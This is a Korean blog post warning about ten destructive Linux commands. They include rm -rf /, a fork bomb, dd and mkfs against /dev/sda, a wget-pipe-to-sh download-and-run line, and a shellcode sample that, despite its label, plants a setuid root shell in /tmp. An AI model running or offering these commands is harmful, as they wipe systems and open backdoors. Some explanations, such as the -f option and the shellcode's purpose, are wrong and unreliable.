※ 주의사항 :
악용하지 마세요!!!
해당 글은 연구 목적으로 기재하였습니다.
악의적인 목적으로 이용할 시 발생할 수 있는 법적 책임은 자신에게 있습니다.
( 01 ) rm -rf
묻지도 따지지도 않고 하위폴더 포함해서 삭제하는 명령어임.
윈도우 Shift+Delete 눌러서 삭제하는 거랑 똑같음.
복구하기 힘들며 가급적이면 i 옵션을 넣어서 삭제하자!
-r 옵션 : 하위 디렉토리를 포함하여 모든 내용 삭제
-f 옵션 : 파일/디렉토리 삭제시 사용자에게 지울 지 메시지 출력하는 옵션
ex. rm -rf / : 루트 디렉토리의 모든 항목 강제 삭제
( 02 ) :(){:|:&};:
:(){:|:&};: 명령어는 포트 폭탄(fork bomb)임.
포트 폭탄 명령어는 가변적으로 작성할 수 있으며 여기서 ':' 문자는 함수를 선언하며 이 함수가 자기 자신을 호출하며 그 결과값을 자기 자신에게 넘겨줌. 포그라운드로 한번 실행되고 그대로 끝나지 않고 프로세스로 남아있도록 백그라운드로 실행됨.
메모리가 100 % 되는 걸 보게 되며 한마디로 재귀 함수를 이용한 공격임.
( 03 ) command > /dev/sda
사용자가 입력한 명령어를 /dev/sda 에 쓰는 명령어로 /dev/sda 의 원본 데이터를 손상시킴.
보통 /dev/sda 는 메인 하드 디스크임.
( 04 ) mv folder /dev/null
/dev/null 장치는 널 디바이스(null device)로 불리우며 리눅스 상에서 블랙홀과 같음.
기록 대상이 되는 모든 데이터를 버리지만 쓰기 작업은 성공했다고 보고하는 장치 파일임.
위 명령어를 통해서 사용자가 지정한 폴더를 /dev/null 로 옮기라는 명령어지만 지정한 폴더는 찾을 수 없음. ㅠㅠ
지워버리는 거나 똑같음.
ex. mv /home/user/* /dev/null : 특정 사용자의 모든 폴더나 파일을 /dev/null 로 옮겨서 파괴시킴.
( 05 ) wget hxxp://malicious_source -O- | sh
위 명령어는 악성코드에서 주로 볼 수 있는 명령어로 악의적인 소스를 다운로드 후 실행시키는 명령어임.
( 06 ) mkfs.ext3 /dev/sda
위 명령어는 sda 형식을 지정하는 명령어로 하드 디스크 드라이브가 NEW 로 표시되며 데이터가 없고 복구할 수 없는 시스템 단계가 됨.
( 07 ) > file
지정한 파일에 덮어쓰는 명령어로 파일의 원본 데이터를 손상시킴.
( 08 ) ^foo^bar
위 명령어는 전체 명령를 입력하지 않고 이전 실행 명령을 편집하는데 사용되는 명령어로 정말로 위험할 수 있음.
( 09 ) dd if=/dev/random of=/dev/sda
위 명령어는 /dev/sda 를 지우고 임의의 쓰레기값으로 작성하는 명령어임.
시스템을 복구 불가능하게 만듬.
( 10 ) 쉘코드로 짜여진 코드
아래 예제 코드는 "rm -rf /" 명령어를 쉘코드로 짠 코드로 감지하기가 쉽지 않음.
char esp[] __attribute__ ((section(".text”))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
참고 사이트 :
https://n0where.net/dangerous-linux-commands/
============================================================
글
댓글 없음:
댓글 쓰기